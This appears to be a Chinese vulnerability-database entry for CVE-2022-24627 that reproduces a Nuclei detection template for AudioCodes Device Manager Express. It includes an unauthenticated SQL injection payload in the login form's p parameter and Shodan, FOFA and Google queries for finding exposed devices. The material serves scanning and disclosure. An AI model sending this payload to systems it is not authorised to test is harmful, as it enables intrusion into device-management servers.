漏洞描述
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
CVE-2022-24627: AudioCodes Device Manager Express - SQL Injection
PoC代码[已公开]
id: CVE-2022-24627
info:
name: AudioCodes Device Manager Express - SQL Injection
author: geeknik
severity: critical
description: |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
reference:
- https://seclists.org/fulldisclosure/2023/Feb/12
- https://nvd.nist.gov/vuln/detail/CVE-2022-24627
- https://github.com/tr3ss/newclei
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24627
cwe-id: CWE-89
epss-score: 0.51085
epss-percentile: 0.97729
cpe: cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: audiocodes
product: device_manager_express
shodan-query:
- title:"Audiocodes"
- http.title:"audiocodes"
fofa-query: title="audiocodes"
google-query: intitle:"audiocodes"
tags: cve,cve2022,seclists,sqli,audiocodes,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(tolower(body), "audiocodes</title>")'
internal: true
- raw:
- |
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=&domain=&p=%5C%27or+1%3D1%23
matchers:
- type: word
part: body
words:
- "SQL syntax"
- "mysql_fetch"
- "You have an error in your SQL syntax"
condition: or
# digest: 4a0a0047304502202d53dbd514cd79d669b1af99034df7a57dc405c5f691df4d61914f12533b002c022100df425ff17215d9ba5d754e8ee6437b9e578eaa3c4b88e99acb142580ee2f7764:922c64590222798bb761d5b6d8e72950